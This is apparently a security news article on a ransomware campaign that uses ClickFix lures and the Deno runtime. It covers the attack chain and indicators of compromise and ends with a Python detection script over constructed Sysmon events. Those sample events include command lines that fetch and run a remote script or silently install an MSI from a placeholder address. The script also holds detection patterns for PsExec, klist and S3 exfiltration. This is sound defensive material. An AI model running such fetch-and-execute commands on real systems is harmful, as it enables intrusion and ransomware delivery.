LeakNet Ransomware Utilizes ClickFix and Deno Runtime for Stealthy Attacks
LeakNet Ransomware Campaign Employs ClickFix Technique and Deno Runtime
A recently discovered ransomware campaign has been leveraging the ClickFix technique to gain initial access to corporate networks, followed by the deployment of a custom malware loader built on the Deno runtime for JavaScript and TypeScript.
ClickFix Technique and BYOR Tactic
The ClickFix technique is a social engineering attack that tricks users into executing malicious commands on their own systems: a fake prompt, typically a bogus CAPTCHA, browser error or "fix it" dialog, instructs the victim to copy a command and paste it into the Windows Run dialog or a terminal. The technique has been employed by multiple ransomware groups, including Termite and Interlock.
In this campaign the command that the victim runs pulls down the attackers' loader together with the Deno runtime itself, a legitimate, signed developer executable. Because the binary that ends up executing the attackers' code is a known, signed tool rather than an unknown file, it slips past blocklists and filters aimed at unrecognised binaries. Researchers have dubbed this tactic "bring your own runtime" (BYOR).
Attack Chain and Post-Exploitation Phase
The attack chain begins with VBScript (.vbs) and PowerShell (.ps1) scripts, named Romeo*.ps1 and Juliet*.vbs, which set up the environment. The Deno runtime then executes the malicious JavaScript/TypeScript directly in memory, leaving minimal forensic artifacts on disk.
The code fingerprints the host, generates a unique victim ID, and connects to the command-and-control (C2) server to retrieve the second-stage payload. It then enters a persistent polling loop, checking back with the C2 for new commands.
During the post-exploitation phase, LeakNet employs a range of tactics: DLL sideloading, C2 beaconing, Kerberos ticket enumeration with klist, lateral movement via PsExec, and payload staging and data exfiltration through Amazon S3 buckets.
Indicators of Compromise
Researchers note that the consistency and repeatability of the attack chain give defenders several opportunities to detect LeakNet activity. Indicators of compromise include:
- Deno (deno.exe) running outside development environments
- Suspicious msiexec execution spawned from browsers
- Abnormal PsExec usage
- Unexpected outbound traffic to Amazon S3
- DLL sideloading from unusual directories
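The indicators above map naturally onto Sysmon telemetry: process creation (Event ID 1), image load (Event ID 7) and network/DNS events (Event IDs 3 and 22). The script below is an added example, not code from the researchers or from the campaign, showing how those indicators can be turned into concrete detection logic and run over a handful of constructed Sysmon-style events. The allow-lists (DENO_DEV_PARENTS, TRUSTED_DIRS, BROWSERS), the sample paths, the bucket name and the 203.0.113.10 address are assumptions for illustration; tune them to your own estate.

```python
"""Toy detection pass over Sysmon-style events for the LeakNet indicators
listed above. Events and allow-lists are constructed for illustration and
are not telemetry from the campaign."""
import re

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe"}
PSEXEC_IMAGES = {"psexec.exe", "psexec64.exe", "psexesvc.exe"}
# Parents a developer would normally launch deno from (assumption; tune per estate)
DENO_DEV_PARENTS = {"code.exe", "cmd.exe", "powershell.exe", "pwsh.exe", "windowsterminal.exe"}
# Directories from which DLL loads are considered normal (assumption)
TRUSTED_DIRS = (
    "c:\\windows\\system32\\",
    "c:\\windows\\syswow64\\",
    "c:\\program files\\",
    "c:\\program files (x86)\\",
)
# Matches bucket.s3.amazonaws.com, bucket.s3.<region>.amazonaws.com, s3-<region>.amazonaws.com
S3_HOST_RE = re.compile(r"(^|\.)s3([.-][a-z0-9-]+)?\.amazonaws\.com$", re.I)
URL_RE = re.compile(r"https?://", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def dirname(path):
    head, _, _ = path.rpartition("\\")
    return head.lower() + "\\"


def in_trusted_dir(path):
    return dirname(path).startswith(TRUSTED_DIRS)


def check_event(evt):
    """Return the IOC labels matched by one event (empty list if none)."""
    hits = []
    eid = evt["EventID"]
    image = evt.get("Image", "")
    exe = basename(image)

    if eid == 1:  # process creation
        parent = basename(evt.get("ParentImage", ""))
        cmd = evt.get("CommandLine", "")
        # BYOR: deno launched from a non-dev parent (e.g. explorer.exe via the
        # Run dialog) or told to execute a script straight from a URL
        if exe == "deno.exe" and (parent not in DENO_DEV_PARENTS or URL_RE.search(cmd)):
            hits.append("deno-outside-dev")
        # ClickFix-style delivery: a browser spawning msiexec
        if exe == "msiexec.exe" and parent in BROWSERS:
            hits.append("msiexec-from-browser")
        # Lateral movement: PsExec client, or its service stub on the target
        if exe in PSEXEC_IMAGES or parent in PSEXEC_IMAGES:
            hits.append("psexec")
        # Kerberos ticket enumeration
        if exe == "klist.exe":
            hits.append("klist-enum")

    elif eid == 7:  # image (DLL) load
        dll = evt.get("ImageLoaded", "")
        signed = str(evt.get("Signed", "")).lower() == "true"
        # Sideloading pattern: executable and unsigned DLL sit together in a
        # directory outside the trusted set
        if not in_trusted_dir(dll) and dirname(dll) == dirname(image) and not signed:
            hits.append("dll-sideload-unusual-dir")

    elif eid in (3, 22):  # network connection / DNS query
        host = evt.get("DestinationHostname") or evt.get("QueryName", "")
        # Browsers talk to S3 all day; anything else doing so is worth a look
        if S3_HOST_RE.search(host) and exe not in BROWSERS:
            hits.append("s3-outbound")
    return hits


def run(events):
    """Return {event index: [labels]} for every event that matched an indicator."""
    findings = {}
    for i, evt in enumerate(events):
        labels = check_event(evt)
        if labels:
            findings[i] = labels
    return findings


# Constructed sample events (not real telemetry); paths and names are made up
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Users\alice\AppData\Local\Temp\deno.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "deno.exe run -A https://203.0.113.10/stage2.ts"},
    {"EventID": 1, "Image": r"C:\Users\bob\.deno\bin\deno.exe",
     "ParentImage": r"C:\Users\bob\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "CommandLine": "deno.exe test"},
    {"EventID": 1, "Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": "msiexec.exe /i https://203.0.113.10/update.msi /qn"},
    {"EventID": 1, "Image": r"C:\Windows\PSEXESVC.exe",
     "ParentImage": r"C:\Windows\System32\services.exe", "CommandLine": "PSEXESVC.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\klist.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": "klist"},
    {"EventID": 7, "Image": r"C:\Users\Public\Music\updater.exe",
     "ImageLoaded": r"C:\Users\Public\Music\version.dll", "Signed": "false"},
    {"EventID": 7, "Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": r"C:\Windows\System32\version.dll", "Signed": "true"},
    {"EventID": 22, "Image": r"C:\Users\alice\AppData\Local\Temp\deno.exe",
     "QueryName": "example-bucket.s3.us-east-1.amazonaws.com"},
    {"EventID": 22, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "QueryName": "example-bucket.s3.us-east-1.amazonaws.com"},
]

if __name__ == "__main__":
    for idx, labels in run(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].get("Image"), labels)
```

The same rules translate directly into Sigma or an EDR query; the point of the allow-lists is that each indicator is only "abnormal" relative to a baseline (developers do run deno, browsers do reach S3, admins do use PsExec), so the heuristics are deliberately written as exceptions to that baseline rather than as blanket matches. Correlating several of these hits on one host within a short window (deno from a URL, then klist, then S3 DNS queries from the same process) is a far stronger signal than any one of them alone.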
